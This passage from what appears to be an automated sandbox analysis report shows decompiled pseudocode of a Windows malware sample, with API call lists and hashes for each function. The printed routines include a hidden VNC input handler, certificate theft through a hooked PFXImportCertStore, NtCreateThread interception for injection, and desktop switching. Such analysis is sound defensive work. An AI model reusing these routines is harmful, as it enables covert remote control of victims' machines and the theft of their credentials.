    									if( *((intOrPtr*)(0x4011c8 + _t556 * 8)) == _t360) {
    										break;
    									}
    									_t480 = _t480 + 1;
    									__eflags = _t480 - 0x32;
    									if(_t480 < 0x32) {
    										continue;
    									}
    									L71:
    									_a15 = 0;
    									do {
    										_t469 = (_a15 & 0x000000ff) * 0xc;
    										_t153 = _t469 + 0x4011a0; // 0xffbe
    										__eflags = _t360 -  *_t153;
    										if(_t360 <  *_t153) {
    											goto L74;
    										}
    										_t154 = _t469 + 0x4011a4; // 0xffd5
    										__eflags = _t360 -  *_t154;
    										if(_t360 <=  *_t154) {
    											_t469 = (_a15 & 0x000000ff) * 0xc;
    											_t159 = _t469 + 0x4011a8; // 0x70
    											_t160 = _t469 + 0x4011a0; // 0xffbe
    											_t436 =  *_t159 -  *_t160 + _v73;
    											__eflags = _t436;
    											L77:
    											__eflags = _t436;
    											if(_t436 != 0) {
    												_t469 = _t436 & 0x000000ff;
    												_t361 = _t560 + _t469 - 0x284;
    												__eflags =  *_t361 - _t515;
    												if( *_t361 == _t515) {
    													goto L16;
    												}
    												 *_t361 = _t515;
    												_t363 = MapVirtualKeyW(_t469, 0) & 0x0000ffff;
    												__eflags = _t363;
    												if(_t363 == 0) {
    													goto L16;
    												}
    												_t366 = (_t363 & 0x0000ffff) << 0x00000010 | _v28;
    												__eflags = _t366;
    												_push(0);
    												_push(_t366);
    												_t515 = _t436;
    												L86:
    												_t469 =  *_t533;
    												_t533[5]();
    												goto L16;
    											}
    											__eflags = _t360 - 0x20;
    											if(_t360 < 0x20) {
    												L80:
    												_t162 = _t360 - 0xa0; // 0xff1e
    												_t469 = _t162;
    												__eflags = _t162 - 0x5f;
    												if(_t162 > 0x5f) {
    													goto L16;
    												}
    												L81:
    												_t368 = _t560 + _t360 - 0x184;
    												__eflags =  *_t368 - _t515;
    												if( *_t368 == _t515) {
    													goto L16;
    												}
    												_push(1);
    												_push(_v28);
    												 *_t368 = _t515;
    												_t515 = _v73;
    												goto L86;
    											}
    											__eflags = _t360 - 0x7e;
    											if(_t360 <= 0x7e) {
    												goto L81;
    											}
    											goto L80;
    										}
    										L74:
    										_a15 = _a15 + 1;
    										__eflags = _a15 - 3;
    									} while (_a15 < 3);
    									goto L77;
    								}
    								_t482 = (_t480 & 0x000000ff) << 3;
    								__eflags =  *((char*)(_t482 + 0x4011cd));
    								_t436 =  *((intOrPtr*)(_t482 + 0x4011cc));
    								if( *((char*)(_t482 + 0x4011cd)) != 0) {
    									_t149 =  &_v28;
    									 *_t149 = _v28 | 0x01000000;
    									__eflags =  *_t149;
    								}
    								goto L71;
    							}
    							_t369 = _t352 - 1;
    							__eflags = _t369;
    							if(_t369 == 0) {
    								_push(0x1b7740);
    								_push( &_v36);
    								_push(_a4);
    								_t371 = 5;
    								_t372 = E0041053D(_t371);
    								__eflags = _t372;
    								if(_t372 == 0) {
    									goto L121;
    								}
    								asm("rol word [ebp-0x1f], 0x8");
    								asm("rol word [ebp-0x1d], 0x8");
    								_a12 = _a12 & 0x00000000;
    								_t557 = 0x8000;
    								_t373 = GetSystemMetrics(0x17);
    								__eflags = _t373;
    								_t526 = _t515 & 0xffffff00 | _t373 != 0x00000000;
    								__eflags = _v35 - _v47;
    								if(_v35 != _v47) {
    									L46:
    									_t557 = 0x8001;
    									L47:
    									_t484 = _v48;
    									_t376 = _v36 & 0x00000001;
    									__eflags = _t376 - (_t484 & 0x00000001);
    									if(_t376 != (_t484 & 0x00000001)) {
    										__eflags = _t376;
    										if(_t376 == 0) {
    											__eflags = _t526;
    											_t398 = ((0 | _t526 == 0x00000000) - 0x00000001 & 0x0000000c) + 4;
    											__eflags = _t398;
    										} else {
    											__eflags = _t526;
    											_t398 = ((0 | _t526 == 0x00000000) - 0x00000001 & 0x00000006) + 2;
    										}
    										_t557 = _t557 | _t398;
    										__eflags = _t557;
    									}
    									_t378 = _v36 & 0x00000004;
    									__eflags = _t378 - (_t484 & 0x00000004);
    									if(_t378 != (_t484 & 0x00000004)) {
    										__eflags = _t378;
    										if(_t378 == 0) {
    											__eflags = _t526;
    											_t389 = ((0 | _t526 == 0x00000000) - 0x00000001 & 0xfffffff4) + 0x10;
    											__eflags = _t389;
    										} else {
    											__eflags = _t526;
    											_t389 = ((0 | _t526 == 0x00000000) - 0x00000001 & 0xfffffffa) + 8;
    										}
    										_t557 = _t557 | _t389;
    										__eflags = _t557;
    									}
    									_t380 = _v36 & 0x00000002;
    									__eflags = _t380 - (_t484 & 0x00000002);
    									if(_t380 != (_t484 & 0x00000002)) {
    										__eflags = _t380;
    										_t557 = _t557 | ((0 | _t380 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x00000040;
    										__eflags = _t557;
    									}
    									__eflags = _v36 & 0x00000008;
    									if((_v36 & 0x00000008) != 0) {
    										_t557 = _t557 | 0x00000800;
    										__eflags = _t557;
    										_a12 = 0x78;
    									}
    									__eflags = _v36 & 0x00000010;
    									if((_v36 & 0x00000010) != 0) {
    										_t557 = _t557 | 0x00000800;
    										__eflags = _t557;
    										_a12 = 0xffffff88;
    									}
    									E0040F0FC( &_v48,  &_v36, 5);
    									_t469 =  *_t533;
    									_t515 = _t557;
    									_t533[6](_v35, _v33, _a12);
    									continue;
    								}
    								__eflags = _v33 - _v45;
    								if(_v33 == _v45) {
    									goto L47;
    								}
    								goto L46;
    							}
    							__eflags = _t369 != 1;
    							if(_t369 != 1) {
    								goto L121;
    							}
    							_push(0x1b7740);
    							_push( &_v124);
    							_push(_a4);
    							_t407 = 3;
    							_t408 = E0041053D(_t407);
    							__eflags = _t408;
    							if(_t408 == 0) {
    								goto L121;
    							}
    							_push(0x1b7740);
    							_push( &_v68);
    							_push(_a4);
    							_t410 = 4;
    							_t411 = E0041053D(_t410);
    							__eflags = _t411;
    							if(_t411 == 0) {
    								goto L121;
    							}
    							_v68 = (_v68 & 0x00ff0000 | _v68 >> 0x00000010) >> 0x00000008 | (_v68 << 0x00000010 | _v68 & 0x0000ff00) << 0x00000008;
    							_t558 = E0040F0A8(((_v68 & 0x00ff0000 | _v68 >> 0x00000010) >> 0x00000008 | (_v68 << 0x00000010 | _v68 & 0x0000ff00) << 0x00000008) + 1);
    							__eflags = _t558;
    							if(_t558 == 0) {
    								E0040F0C0(0);
    								goto L121;
    							}
    							_t421 = E0041053D(_v68, _a4, _t558, 0x1b7740);
    							__eflags = _t421;
    							if(_t421 == 0) {
    								goto L121;
    							}
    							_t515 = _v68;
    							_t469 =  *_t533;
    							_t533[7](_t558);
    							E0040F0C0(_t558);
    						}
    						if( *0x416de4() != 0x274c) {
    							goto L121;
    						}
    						_t469 =  *_t533;
    						_t533[4]();
    						_t443 = _v20;
    						_a12 = _a12 & 0x00000000;
    						if(_t443 <= 0) {
    							goto L16;
    						}
    						_v28 = _v28 & 0x00000000;
    						_t444 = _t443 * 9;
    						do {
    							_t469 = _v24;
    							_t554 = _v28 + _v24;
    							if( *((short*)(_t554 + 5)) > 0 &&  *((short*)(_t554 + 7)) > 0) {
    								_push(_t554);
    								_push(_a4);
    								_t313 = E00413163(_v16);
    								if(_t313 == 0xffffffff || _t313 == 0) {
    									goto L121;
    								} else {
    									if(_t313 == 1) {
    										if(_a12 + 1 != _v20) {
    											E0040F161(_t554, 9);
    										} else {
    											_v20 = _v20 - 1;
    											_t444 = _t444 - 9;
    											E0040F053(_t444,  &_v24);
    										}
    									}
    									goto L29;
    								}
    							}
    							L29:
    							_a12 = _a12 + 1;
    							_v28 = _v28 + 9;
    						} while (_a12 < _v20);
    						goto L16;
    					}
    				}
    			}

    APIs
      • Part of subcall function 0041059E: send.WS2_32(0000000C,0000000C,0000000C,00000000), ref: 004105AC
    • WSAGetLastError.WS2_32(?,0000012C,00000000,00000031,00000020,00000010,?,?,001B7740,?,00000003,001B7740,?,?,001B7740,?), ref: 004139C0
      • Part of subcall function 00413163: SelectObject.GDI32(?,?), ref: 00413192
      • Part of subcall function 00413163: SelectObject.GDI32(?,00000000), ref: 004131CB
    • GetSystemMetrics.USER32(00000017), ref: 00413B74
    • MapVirtualKeyW.USER32(00000000,00000000), ref: 00413D84
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: ObjectSelect$ErrorLastMetricsSystemVirtualsend
    • String ID: $RFB $RFB 003.003$x
    • API String ID: 3800035660-914445781
    • Opcode ID: f03e16390c05876003d196f5119de7119b307f51ede7dded3d0bbe7a1c07eaab
    • Instruction ID: 698ccea15abeba6b541060362cf8f4724d2f02bec1deccea95f10b8b14db5bfe
    • Opcode Fuzzy Hash: f03e16390c05876003d196f5119de7119b307f51ede7dded3d0bbe7a1c07eaab
    • Instruction Fuzzy Hash: C0424531D00249ABDF24DFA5C845BEE7BB5EF44344F54406BE941AB282DB7C8E85CB98
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 82%
    			E0040486E(void* __ecx, void* __edx) {
    				intOrPtr _t19;
    				intOrPtr _t25;
    				void* _t36;
    				intOrPtr _t37;
    				void* _t39;
    				void* _t41;
    				void* _t42;
    				void* _t45;
    				intOrPtr* _t46;
    				void* _t48;
    				void* _t50;
    
    				_t41 = __edx;
    				_t39 = __ecx;
    				_t48 = _t50 - 0x6c;
    				_t37 =  *((intOrPtr*)(_t48 + 0x78));
    				_t46 =  *((intOrPtr*)(_t48 + 0x74));
    				_t19 =  *0x416d1c(_t46, _t37,  *((intOrPtr*)(_t48 + 0x7c)), _t42, _t45, _t36);
    				 *((intOrPtr*)(_t48 + 0x7c)) = _t19;
    				if(_t19 != 0 && _t46 != 0 &&  *_t46 != 0 &&  *((intOrPtr*)(_t46 + 4)) != 0) {
    					GetSystemTime(_t48 + 0x5c);
    					_t25 =  *0x416c34; // 0x25df5a8
    					_t11 = _t25 + 0x178; // 0x25643a8
    					wnsprintfW(_t48 - 0x6c, 0x63,  *_t11, L"grb",  *(_t48 + 0x62) & 0x0000ffff,  *(_t48 + 0x5e) & 0x0000ffff,  *(_t48 + 0x5c) & 0x0000ffff);
    					if(E00415305(_t39, _t41, 3, 0, _t48 - 0x6c,  *((intOrPtr*)(_t46 + 4)),  *_t46) == 0) {
    						L7:
    						 *((intOrPtr*)(_t48 + 0x7c)) = 0;
    					} else {
    						if(_t37 != 0) {
    							lstrcatW(_t48 - 0x6c, L".txt");
    							if(E00415305(_t37, _t41, 3, 0, _t48 - 0x6c, _t37, E0040F533(_t37) + _t32) == 0) {
    								goto L7;
    							}
    						}
    					}
    				}
    				return  *((intOrPtr*)(_t48 + 0x7c));
    			}

    APIs
    • PFXImportCertStore.CRYPT32(?,?,?), ref: 00404887
    • GetSystemTime.KERNEL32(?), ref: 004048B3
    • wnsprintfW.SHLWAPI ref: 004048DE
    • lstrcatW.KERNEL32(?,.txt), ref: 00404909
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CertImportStoreSystemTimelstrcatwnsprintf
    • String ID: .txt$grb
    • API String ID: 1380901484-2795990106
    • Opcode ID: e23c33f906e7cf3e20f18cadb6924f4198b2c7d4141211660669a46235e87e01
    • Instruction ID: 29a073afa3b7aa8db112aecf2a51147a39ca4b5dab3ecab49a569e557fbd1a41
    • Opcode Fuzzy Hash: e23c33f906e7cf3e20f18cadb6924f4198b2c7d4141211660669a46235e87e01
    • Instruction Fuzzy Hash: 6B2150B2500608ABDB309FA9DD44EEFB7ECEB88705F108537FA64E3591D2799944CB24
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040B231(void* __ecx, void* __eflags, void* _a4, intOrPtr _a8) {
    				short _v524;
    				void* __edi;
    				void* _t16;
    				void* _t20;
    				void* _t34;
    				void** _t37;
    
    				_t34 = __ecx;
    				E0040B088( &_v524, _a8);
    				_t16 = 0x14;
    				_t37 = E0040F0A8(_t16);
    				if(_t37 != 0) {
    					_t20 = CreateNamedPipeW( &_v524, 3, 6, 0xff, 0x200, 0x200, 0, 0);
    					 *_t37 = _t20;
    					if(_t20 != 0xffffffff) {
    						_t37[1] = CreateEventW(0, 0, 0, 0);
    						_t37[2] = CreateEventW(0, 0, 0, 0);
    						_t37[3] = _a4;
    						_t37[4] = E0040F21C(_a8);
    						if(E0040C14A(_t34, E0040B0A9, _t37) != 0) {
    							WaitForSingleObject(_t37[2], 0xffffffff);
    							return _t37;
    						}
    						CloseHandle( *_t37);
    						CloseHandle(_t37[1]);
    						CloseHandle(_t37[2]);
    						E0040F0C0(_t37[4]);
    					}
    					E0040F0C0(_t37);
    				}
    				return 0;
    			}

    APIs
      • Part of subcall function 0040B088: lstrcpyW.KERNEL32(?,\\.\pipe\), ref: 0040B091
      • Part of subcall function 0040B088: lstrcpyW.KERNEL32(?,?), ref: 0040B09F
    • CreateNamedPipeW.KERNEL32(?,00000003,00000006,000000FF,00000200,00000200,00000000,00000000,?,?,00000001), ref: 0040B27A
    • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,00000001), ref: 0040B293
    • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,00000001), ref: 0040B2A0
      • Part of subcall function 0040C14A: CreateThread.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 0040C160
      • Part of subcall function 0040C14A: CloseHandle.KERNEL32(00000000,?,?,00409EEF,00409DB4,00000000), ref: 0040C167
    • CloseHandle.KERNEL32(00000000,0040B0A9,00000000,?,00000001), ref: 0040B2CB
    • CloseHandle.KERNEL32(?,?,00000001), ref: 0040B2D4
    • CloseHandle.KERNEL32(?,?,00000001), ref: 0040B2DD
      • Part of subcall function 0040F0C0: HeapFree.KERNEL32(00000000,00000000,0040B690,00000000,00000001), ref: 0040F0D3
    • WaitForSingleObject.KERNEL32(?,000000FF,0040B0A9,00000000,?,00000001), ref: 0040B2F2
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CloseCreateHandle$Eventlstrcpy$FreeHeapNamedObjectPipeSingleThreadWait
    • String ID:
    • API String ID: 306608339-0
    • Opcode ID: f23d121d14f02fa3209879632265a8dbf9b660d725feb563adbc882fbfe908f0
    • Instruction ID: 6fe8837a8baf8c72bd574b51e69667a0997d70e1d20b33aa98009220c85d07c8
    • Opcode Fuzzy Hash: f23d121d14f02fa3209879632265a8dbf9b660d725feb563adbc882fbfe908f0
    • Instruction Fuzzy Hash: 8D219D31500301ABC7306F32DC0DD9B7AB8EF95710B118A3EB5A6E25E1DB389841DBA8
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00415582() {
    				char _v5;
    				struct _WIN32_FIND_DATAW _v604;
    				short _v1124;
    				void* __esi;
    				void* _t23;
    				void* _t25;
    				intOrPtr _t28;
    				void* _t29;
    				intOrPtr _t30;
    				intOrPtr _t32;
    				int _t35;
    				void* _t44;
    
    				_v5 = 0;
    				E00415561( &_v1124);
    				_t23 = FindFirstFileW( &_v1124,  &_v604);
    				if(_t23 == 0xffffffff) {
    					L5:
    					_t25 = FindFirstFileW(0x417478,  &_v604);
    					__eflags = _t25 - 0xffffffff;
    					if(_t25 == 0xffffffff) {
    						L16:
    						return _v5;
    					}
    					FindClose(_t25);
    					__eflags = _v604.nFileSizeLow;
    					if(_v604.nFileSizeLow > 0) {
    						L8:
    						_t28 =  *0x416c34; // 0x25df5a8
    						_t11 = _t28 + 0x20; // 0x25df890
    						_t29 = CreateMutexW(0x417680, 0,  *_t11);
    						__eflags = _t29;
    						if(_t29 == 0) {
    							_t44 = 0;
    							__eflags = 0;
    						} else {
    							_t44 = E004115FE(_t29);
    						}
    						_t30 =  *0x416c34; // 0x25df5a8
    						_t12 = _t30 + 0x2c; // 0x25df908
    						E0040B37A(__eflags,  *_t12, 8, 0, 0, 0, 0);
    						__eflags = _v604.nFileSizeHigh;
    						if(_v604.nFileSizeHigh <= 0) {
    							__eflags = _v604.nFileSizeLow;
    							if(__eflags > 0) {
    								_t35 = MoveFileExW(0x417478,  &_v1124, 3);
    								__eflags = _t35;
    								_t16 =  &_v5;
    								 *_t16 = _t35 != 0;
    								__eflags =  *_t16;
    							}
    						} else {
    							E0040FFBF(0x417478);
    						}
    						_t32 =  *0x416c34; // 0x25df5a8
    						_t17 = _t32 + 0x2c; // 0x25df908
    						E0040B37A(__eflags,  *_t17, 7, 0, 0, 0, 0);
    						E0041161F(_t44);
    						goto L16;
    					}
    					__eflags = _v604.nFileSizeHigh;
    					if(_v604.nFileSizeHigh <= 0) {
    						goto L16;
    					}
    					goto L8;
    				}
    				FindClose(_t23);
    				if(_v604.nFileSizeLow <= 0 || _v604.nFileSizeHigh != 0) {
    					E0040FFBF( &_v1124);
    					goto L5;
    				} else {
    					return 1;
    				}
    			}

    APIs
      • Part of subcall function 00415561: lstrcpyW.KERNEL32(004158C0,00417478), ref: 0041556A
      • Part of subcall function 00415561: lstrcatW.KERNEL32(?,.lll), ref: 00415579
    • FindFirstFileW.KERNEL32(?,?,?,?,?,?), ref: 004155AD
    • FindClose.KERNEL32(00000000,?,?,?), ref: 004155B9
    • FindFirstFileW.KERNEL32(00417478,?,?,?,?), ref: 004155EF
    • FindClose.KERNEL32(00000000,?,?,?), ref: 004155FF
    • CreateMutexW.KERNEL32(00417680,00000000,025DF890,?,?,?), ref: 00415623
    • MoveFileExW.KERNEL32(00417478,?,00000003,025DF908,00000008,00000000,00000000,00000000,00000000,?,?,?), ref: 0041566F
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Find$File$CloseFirst$CreateMoveMutexlstrcatlstrcpy
    • String ID:
    • API String ID: 1879962031-0
    • Opcode ID: ad996db81e10b1df0ec1e58bf669fd31810340a2eaa5de82ab55f143d9384247
    • Instruction ID: e557b12710132166f3590febf44e1a0fedd1765762edf04073cf77be4a1c1cc3
    • Opcode Fuzzy Hash: ad996db81e10b1df0ec1e58bf669fd31810340a2eaa5de82ab55f143d9384247
    • Instruction Fuzzy Hash: 30319371800518EFCB20AB649DC4EEE777DEB45359F5141BBF208A2160D7388E858F6D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00411D26(void* __ecx, intOrPtr* __edx, WCHAR* _a4, WCHAR* _a8, signed int _a12) {
    				short _v540;
    				char _v548;
    				short _v1044;
    				short _v1052;
    				char _v1068;
    				struct _WIN32_FIND_DATAW _v1644;
    				signed char _v1660;
    				void* __edi;
    				int _t25;
    				void* _t46;
    				void* _t52;
    				intOrPtr* _t55;
    
    				_t55 = __edx;
    				_t52 = __ecx;
    				_t25 = PathCombineW( &_v1044, _a4, "*");
    				if(_t25 == 0) {
    					L12:
    					return _t25;
    				}
    				_t25 = FindFirstFileW( &_v1052,  &_v1644);
    				_t46 = _t25;
    				if(_t46 == 0xffffffff) {
    					goto L12;
    				} else {
    					goto L2;
    				}
    				do {
    					L2:
    					if(E0040FFDD( &(_v1644.cFileName)) == 0 && PathCombineW( &_v1052, _a4,  &(_v1644.cFileName)) != 0 && PathCombineW( &_v540, _a8,  &(_v1644.dwReserved0)) != 0) {
    						if((_v1660 & 0x00000010) == 0) {
    							if(E00411C49(_t52,  &_v1068,  &_v548) != 0) {
    								 *_t55 =  *_t55 + 1;
    							}
    						} else {
    							if((_a12 & 0x00000001) != 0) {
    								E00411D26(_t52, _t55,  &_v1068,  &_v548, _a12);
    							}
    						}
    					}
    				} while (FindNextFileW(_t46,  &_v1644) != 0);
    				_t25 = FindClose(_t46);
    				goto L12;
    			}

    APIs
    • PathCombineW.SHLWAPI(?,00405611,00401058,00000000,00000000,00000000), ref: 00411D49
    • FindFirstFileW.KERNEL32(?,?), ref: 00411D64
    • PathCombineW.SHLWAPI(?,00405611,?), ref: 00411D92
    • PathCombineW.SHLWAPI(?,?,?), ref: 00411DAC
    • FindNextFileW.KERNEL32(00000000,?), ref: 00411E02
    • FindClose.KERNEL32(00000000), ref: 00411E11
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CombineFindPath$File$CloseFirstNext
    • String ID:
    • API String ID: 3830188700-0
    • Opcode ID: 23f2b425feb4d18e97780faac2eed7a0d396ff4b1a5951ad9db3b1a51bc65043
    • Instruction ID: a4fd040686ebf23308ed824e65d3e39c574d42efa37f519916c93dec6cce8b94
    • Opcode Fuzzy Hash: 23f2b425feb4d18e97780faac2eed7a0d396ff4b1a5951ad9db3b1a51bc65043
    • Instruction Fuzzy Hash: 0321607120834AABCB20DB60EC48EEB77EDAB45318F00492BBA95C2160EB79D559C759
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E004076BC(CONTEXT* __ebx, void* __edi, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, void* _a20, struct _EXCEPTION_RECORD _a24, struct _PROCESS_PARAMETERS _a28, char _a32) {
    				long _v8;
    				intOrPtr _v16;
    				intOrPtr _v28;
    				void _v32;
    				intOrPtr _v48;
    				void* _v60;
    				void* _t29;
    				int _t33;
    				CONTEXT* _t37;
    				void* _t40;
    
    				_t37 = __ebx;
    				if(NtQueryInformationProcess(_a20, 0,  &_v32, 0x18,  &_v8) != 0 || _v28 == 0) {
    					L13:
    					return NtCreateThread(_a8, _a12, _a16, _a20, _a24, _t37, _a28, _a32);
    				} else {
    					_v8 = 0;
    					if(_v16 == 0) {
    						L11:
    						_t29 = E004070D3(_a20);
    						if(_t29 != 0) {
    							 *((intOrPtr*)(_t37 + 0xb0)) = _t29 + _a4;
    						}
    						goto L13;
    					}
    					_t40 = CreateToolhelp32Snapshot(4, 0);
    					if(_t40 == 0) {
    						L10:
    						if(_v8 != 0) {
    							goto L13;
    						}
    						goto L11;
    					}
    					_v60 = 0x1c;
    					_t33 = Thread32First(_t40,  &_v60);
    					while(_t33 != 0) {
    						if(_v48 == _v16) {
    							_v8 = _v8 + 1;
    						}
    						_t33 = Thread32Next(_t40,  &_v60);
    					}
    					CloseHandle(_t40);
    					goto L10;
    				}
    			}

    APIs
    • NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,?), ref: 004076D3
    • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 004076EE
    • Thread32First.KERNEL32(00000000,?), ref: 00407706
    • Thread32Next.KERNEL32(00000000,0000001C), ref: 0040771E
    • CloseHandle.KERNEL32(00000000), ref: 00407729
    • NtCreateThread.NTDLL(?,?,?,?,?,?,?,?), ref: 00407762
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CreateThread32$CloseFirstHandleInformationNextProcessQuerySnapshotThreadToolhelp32
    • String ID:
    • API String ID: 1144773994-0
    • Opcode ID: e9aa468f78780362bb11592afe0da96d354cdb422d82eb448901ac4eb4f1d333
    • Instruction ID: 3753e930f9030660ce60b00ff12ece1227bf3df83c378ee524f8039dd191db27
    • Opcode Fuzzy Hash: e9aa468f78780362bb11592afe0da96d354cdb422d82eb448901ac4eb4f1d333
    • Instruction Fuzzy Hash: 27210832905119EFDF129F90DC44DEFBB79EB44784F118036F905A2190D734E952DBAA
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E004079FA(void* __ecx, void* __edx, void* __eflags, signed int _a8) {
    				short _v524;
    				char _v532;
    				short _v1072;
    				struct _WIN32_FIND_DATAW _v1120;
    				short _v1636;
    				short _v1640;
    				void* _t23;
    				int _t27;
    				void* _t35;
    				void* _t36;
    				WCHAR* _t38;
    				void* _t39;
    
    				_t36 = __edx;
    				_t35 = __ecx;
    				_t14 = _a8;
    				_t38 = E0040F4DC(_a8 | 0xffffffff,  *_t14);
    				if(_t38 != 0) {
    					ExpandEnvironmentStringsW(_t38,  &_v1636, 0x103);
    					E0040F0C0(_t38);
    					_t39 = FindFirstFileW( &_v1640,  &_v1120);
    					__eflags = _t39;
    					if(_t39 != 0) {
    						PathRemoveFileSpecW( &_v1636);
    						do {
    							__eflags = _v1120.ftCreationTime.dwFileAttributes & 0x00000010;
    							if(__eflags == 0) {
    								PathCombineW( &_v524,  &_v1636,  &_v1072);
    								E0041547E(_t35, _t36, __eflags,  &_v532, 0,  &_v532);
    							}
    							_t27 = FindNextFileW(_t39,  &(_v1120.ftCreationTime));
    							__eflags = _t27;
    						} while (_t27 != 0);
    						FindClose(_t39);
    					}
    					_t23 = 1;
    				} else {
    					_t23 = 0;
    				}
    				return _t23;
    			}

    APIs
      • Part of subcall function 0040F4DC: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,?,00000000,0040B681,00000001), ref: 0040F50D
    • ExpandEnvironmentStringsW.KERNEL32(00000000,00000103,00000103,?), ref: 00407A2C
    • FindFirstFileW.KERNEL32(?,?,00000000), ref: 00407A45
    • PathRemoveFileSpecW.SHLWAPI(?), ref: 00407A56
    • PathCombineW.SHLWAPI(?,?,?), ref: 00407A7B
    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00407A9A
    • FindClose.KERNEL32(00000000), ref: 00407AA5
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: FileFind$Path$ByteCharCloseCombineEnvironmentExpandFirstMultiNextRemoveSpecStringsWide
    • String ID:
    • API String ID: 3264331536-0
    • Opcode ID: 10a113e8d4bf22edbfcd64d253be27d9aa2e10fc38427998e2c366ddc3a5bb9a
    • Instruction ID: 553e09da5053cc09fdc0209efac00036261da7612b3bed5ded28cf039da4d823
    • Opcode Fuzzy Hash: 10a113e8d4bf22edbfcd64d253be27d9aa2e10fc38427998e2c366ddc3a5bb9a
    • Instruction Fuzzy Hash: 2E1186725086186BC331DB60DC48EDF77ECAF45310F008A3AF954D2190D738D6058BAA
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • CryptAcquireContextW.ADVAPI32(0041420C,00000000,00000000,00000001,F0000040,?,0041420C,00000000,?,-0000001C,00000000,?,?,?), ref: 0041010F
    • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 00410127
    • CryptHashData.ADVAPI32(?,00000010), ref: 00410142
    • CryptGetHashParam.ADVAPI32(?,00000002,?,00000010,00000000), ref: 00410159
    • CryptDestroyHash.ADVAPI32(?), ref: 00410170
    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0041017A
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamRelease
    • String ID:
    • API String ID: 3186506766-0
    • Opcode ID: 9e3d9cc19cc56eed7fd62d552180aacc983cdfcc723d2db39dc424aaec30bfe4
    • Instruction ID: 55f3b8ffd3746c5a0a9ec5e145f7040ea233fd5557318470747f5ca4dd69f733
    • Opcode Fuzzy Hash: 9e3d9cc19cc56eed7fd62d552180aacc983cdfcc723d2db39dc424aaec30bfe4
    • Instruction Fuzzy Hash: 1B11E87190020CBFEF115FA4CC44FEF7B7CEB04784F008465B551A12A1EBBA8D949B68
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040BFE7() {
    				intOrPtr _t3;
    				intOrPtr _t8;
    				long _t12;
    				struct HWINSTA__* _t13;
    				struct HDESK__* _t15;
    
    				_t3 =  *0x416c34; // 0x25df5a8
    				_t12 = 0;
    				_t1 = _t3 + 0x78; // 0x25dfaf9
    				_t13 = OpenWindowStationA( *_t1, 0, 0x10000000);
    				if(_t13 != 0) {
    					if(SetProcessWindowStation(_t13) != 0) {
    						_t8 =  *0x416c34; // 0x25df5a8
    						_t2 = _t8 + 0x7c; // 0x25dfc59
    						_t15 = OpenDesktopA( *_t2, 0, 0, 0x10000000);
    						if(_t15 != 0) {
    							SetThreadDesktop(_t15);
    							_t12 = 1;
    							CloseDesktop(_t15);
    						}
    					}
    					CloseWindowStation(_t13);
    				}
    				return _t12;
    			}

    APIs
    • OpenWindowStationA.USER32(025DFAF9,00000000,10000000), ref: 0040BFFB
    • SetProcessWindowStation.USER32(00000000), ref: 0040C008
    • OpenDesktopA.USER32(025DFC59,00000000,00000000,10000000), ref: 0040C01D
    • SetThreadDesktop.USER32(00000000), ref: 0040C02A
    • CloseDesktop.USER32(00000000), ref: 0040C033
    • CloseWindowStation.USER32(00000000), ref: 0040C03A
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: DesktopStationWindow$CloseOpen$ProcessThread
    • String ID:
    • API String ID: 2658375134-0
    • Opcode ID: 4bcf8cbb21c16f678587ba5fc99d68d5f903d6dff48441f62968e74d89113649
    • Instruction ID: 9a32b9f1a6c9afef737543acc3624aad95a547df286c964ebdcfe3cf58ddb98f
    • Opcode Fuzzy Hash: 4bcf8cbb21c16f678587ba5fc99d68d5f903d6dff48441f62968e74d89113649
    • Instruction Fuzzy Hash: EEF03076102034EFD7202FA9ACC8EEB3AACEB493A53068036F105D3231C625AC01C7A8
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00405C8F(signed int _a4, void* _a8, _Unknown_base(*)()* _a12, void* _a16, struct _ERESOURCE_LITE _a20, void* _a24, long _a28, union _FILE_INFORMATION_CLASS _a32, long _a36, struct _EXCEPTION_RECORD _a40, char _a44) {
    				char _v524;
    				WCHAR* _v1544;
    				void _v1548;
    				void* __edi;
